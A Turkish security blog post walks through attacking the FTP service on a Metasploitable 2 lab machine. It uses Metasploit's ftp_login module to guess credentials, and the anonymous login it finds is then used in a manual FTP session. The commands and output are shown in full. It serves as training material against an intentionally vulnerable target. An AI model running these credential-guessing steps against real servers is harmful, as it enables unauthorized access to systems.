SECURITY GENEL

Metasploitable 2 Exploit ftp

Metasploitable 2 Exploit ftp

Exploit # 8 : FTP

Nmap ve nessus taramasında 21/ftp portunun açık olduğu görülünce metasploitte ftp_login modülüyle kullanıcı adı ve parola için bir deneme yapılabilir. Metasploitin kendi sözlükleri yeterli olabilir.

 

msf> search ftp login

 

Matching Modules

================

  Name                                     Disclosure Date       Rank    Description

  —-                                     —————       —-    ———–

  auxiliary/dos/windows/ftp/guildftp_cwdlist  2008-10-12 00:00:00 UTC  normal Guild FTPd 0.999.8.11/0.999.14 Heap Corruption

  auxiliary/dos/windows/ftp/titan626_site 2008-10-14 00:00:00 UTC  normal Titan FTP Server 6.26.630 SITE WHO DoS

  auxiliary/dos/windows/ftp/winftp230_nlst 2008-09-26 00:00:00 UTC  normal WinFTP 2.3.0 NLST Denial of Service

  auxiliary/dos/windows/ftp/xmeasy560_nlst 2008-10-13 00:00:00 UTC  normal XM Easy Personal FTP Server 5.6.0 NLST DoS

  auxiliary/dos/windows/ftp/xmeasy570_nlst 2009-03-27 00:00:00 UTC  normal XM Easy Personal FTP Server 5.7.0 NLST DoS

  auxiliary/scanner/ftp/ftp_login                                   normal FTP Authentication Scanner

  exploit/windows/ftp/freefloatftp_wbem    2012-12-07 00:00:00 UTC  excellent  FreeFloat FTP Server Arbitrary File Upload

  exploit/windows/ftp/warftpd_165_pass     1998-03-19 00:00:00 UTC  average War-FTPD 1.65 Password Overflow

  post/windows/gather/credentials/ftpx                              normal Windows Gather FTP Explorer (FTPX) Credential Extraction

  post/windows/gather/credentials/smartftp                          normal Windows Gather SmartFTP Saved Password Extraction

 

 

msf auxiliary(rlogin_login) > use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > show options

 

Module options (auxiliary/scanner/ftp/ftp_login):

  Name           Current Setting   Required  Description

  —-           —————  ——–  ———–

  BLANK_PASSWORDS   true          no     Try blank passwords for all users

  BRUTEFORCE_SPEED  5             yes    How fast to bruteforce, from 0 to 5

  PASSWORD                        no     A specific password to authenticate with

  PASS_FILE                       no     File containing passwords, one per line

  RECORD_GUEST   false         no     Record anonymous/guest logins to the database

  RHOSTS                          yes    The target address range or CIDR identifier

  RPORT          21            yes    The target port

  STOP_ON_SUCCESS   false         yes    Stop guessing when a credential works for a host

  THREADS        1             yes    The number of concurrent threads

  USERNAME                        no     A specific username to authenticate as

  USERPASS_FILE                   no     File containing users and passwords separated by space, one pair per line

  USER_AS_PASS   true         no     Try the username as the password for all users

  USER_FILE                       no     File containing usernames, one per line

  VERBOSE        true          yes    Whether to print output for all attempts

 

msf auxiliary(ftp_login) > set RHOSTS 172.16.52.133

RHOSTS => 172.16.52.133

msf auxiliary(ftp_login) > exploit

 

[*] 172.16.52.133:21 – Starting FTP login sweep

[*] Connecting to FTP server 172.16.52.133:21…

[*] Connected to target FTP server.

[*] 172.16.52.133:21 – FTP Banner: ‘220 (vsFTPd 2.3.4)\x0d\x0a’

[*] 172.16.52.133:21 FTP – Attempting FTP login for ‘anonymous’:’User@’

[+] 172.16.52.133:21 – Successful FTP login for ‘anonymous’:’User@’

[*] 172.16.52.133:21 – User ‘anonymous’ has READ access

[*] Successful authentication with read access on 172.16.52.133 will not be reported

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(ftp_login) >

 

Tarama sonucunda kullanıcı adı:anonymous parola:user@ yakalandı. Bununla konsoldan giriş yapılabilir. Yada tarayıcı üzerinden ftp://172.16.52.133 ile ulaşılabilir.FTP sunucusuna bağlanarak yetki kazanmak için bazı bilgiler elde edilebilir.

#ftp 172.16.52.133

Connected to 172.16.52.133.

220 (vsFTPd 2.3.4)

Name (172.16.52.133:root): anonymous   

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls -lat

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x 2 0     65534     4096 Mar 17  2010 ..

drwxr-xr-x 2 0     65534     4096 Mar 17  2010 .

226 Directory send OK

 

Etiketler

İlgili Makaleler

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu
Kapalı